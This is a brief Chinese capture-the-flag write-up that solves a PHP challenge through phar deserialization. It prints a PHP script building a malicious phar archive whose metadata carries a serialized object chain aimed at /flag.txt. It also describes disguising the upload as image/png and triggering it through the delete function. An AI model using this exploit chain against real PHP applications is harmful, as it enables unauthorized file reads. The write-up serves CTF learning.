步骤:
1.运行这个:
<?php
class User {
public $db;
}
class File {
public $filename;
}
class FileList {
private $files;
public function __construct() {
$file = new File();
$file->filename = "/flag.txt";
$this->files = array($file);
}
}
$a = new User();
$a->db = new FileList();
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new User();
$o->db = new FileList();
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
生成一个phar.phar文件:
注意要设置:phar.readonly = Off。PS:一开始我用的是PHP7无法生成,后来改成PHP5便可以了
2.更改Content-Type为image/png然后上传
3.在delete里面读取phar得到flag
参考:
https://blog.csdn.net/weixin_44077544/article/details/102844554